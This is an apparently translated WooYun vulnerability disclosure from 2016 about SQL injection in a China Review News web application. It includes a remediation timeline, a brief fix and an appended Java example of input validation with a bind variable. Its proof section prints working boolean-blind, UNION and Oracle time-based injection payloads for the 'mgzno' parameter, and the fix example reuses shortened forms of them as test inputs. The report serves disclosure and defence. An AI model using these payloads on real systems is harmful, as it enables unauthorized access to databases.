Vulnerability Summary

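Bug ID: wooyun-2016-0168656

Title: China Review News: multiple SQL injections (bundled) # can affect multiple websites on the same server (Hong Kong region)

Vendor: China Review News (中评网)

Author: Ghost丶与狼共舞

Submitted: 2016-01-11 13:35

Fixed: 2016-02-27 11:49

Disclosed: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (hkcert, the Hong Kong internet emergency response coordination centre) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]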



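Vulnerability Details

Disclosure status:

2016-01-11: Details reported to the vendor; awaiting vendor handling
2016-01-14: Vendor has confirmed; details disclosed to the vendor only
2016-01-24: Details disclosed to core white hats and experts in related fields
2016-02-03: Details disclosed to regular white hats
2016-02-13: Details disclosed to trainee white hats
2016-02-27: Details disclosed to the public

Brief description:

China Review News: multiple SQL injections (bundled) # can affect multiple websites on the same server

Detailed description:

http://**.**.**.**/crn-webapp/zpykpub/left.jsp?mgzno=214 -- this one does not need time-delay injection
**.**.**.**/crn-webapp/zpykpub/index.jsp?mgzno=213

Proof of vulnerability: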

---
Place: GET
Parameter: mgzno
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mgzno=214 AND 1839=1839
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: mgzno=-5247 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(119)||CHR(118)||CHR(118)||CHR(113)||CHR(104)||CHR(121)||CHR(114)||CHR(78)||CHR(111)||CHR(87)||CHR(89)||CHR(67)||CHR(90)||CHR(74)||CHR(113)||CHR(99)||CHR(110)||CHR(100)||CHR(113),NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: mgzno=214 AND 2650=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(77)||CHR(72)||CHR(78),5)
---
web server operating system: Windows
web application technology: Apache 2.0.64
back-end DBMS: Oracle
available databases [22]:

Fix:

Parameter filtering

Copyright notice: when reposting, please credit the source Ghost丶与狼共舞@乌云 (WooYun)
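
An added example, not part of the original report or the vendor's code: one way to apply the suggested fix to the `mgzno` parameter on a JSP/Oracle stack is to accept only a plain integer and pass it to the database as a bind variable. The class name `MgznoLookup` and the table and column names `magazine_issue`, `title` and `mgzno` are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Optional;
import java.util.regex.Pattern;

public class MgznoLookup {
    // mgzno is an issue number: 1 to 9 ASCII digits and nothing else.
    private static final Pattern ISSUE_NO = Pattern.compile("[0-9]{1,9}");

    /** Returns the parsed issue number, or empty if the raw value is not a plain integer. */
    static Optional<Integer> parseMgzno(String raw) {
        if (raw == null || !ISSUE_NO.matcher(raw).matches()) {
            return Optional.empty();
        }
        return Optional.of(Integer.parseInt(raw)); // 9 digits always fit in an int
    }

    /** Looks up an issue title with the value bound as data, never concatenated into the SQL text. */
    static Optional<String> findTitle(Connection db, String rawMgzno) throws SQLException {
        Optional<Integer> mgzno = parseMgzno(rawMgzno);
        if (!mgzno.isPresent()) {
            return Optional.empty(); // the caller should answer with HTTP 400
        }
        // Hypothetical table and column names; the bind variable is the actual fix.
        String sql = "SELECT title FROM magazine_issue WHERE mgzno = ?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setInt(1, mgzno.get());
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? Optional.ofNullable(rs.getString(1)) : Optional.empty();
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: one legitimate value plus shortened forms of the values in the proof section.
        String[] samples = {
            "214",
            "214 AND 1839=1839",
            "-5247 UNION ALL SELECT NULL FROM DUAL--",
            "214 AND 2650=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112),5)"
        };
        for (String s : samples) {
            System.out.println(parseMgzno(s).map(n -> "accepted " + n).orElse("rejected") + " <- " + s);
        }
    }
}
```

Running `main` needs no database: only `214` is accepted, and the other three values are rejected before any SQL is built.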


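Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-14 16:24

Vendor reply:

The incident has been reported to the relevant organizations.

Latest status:

None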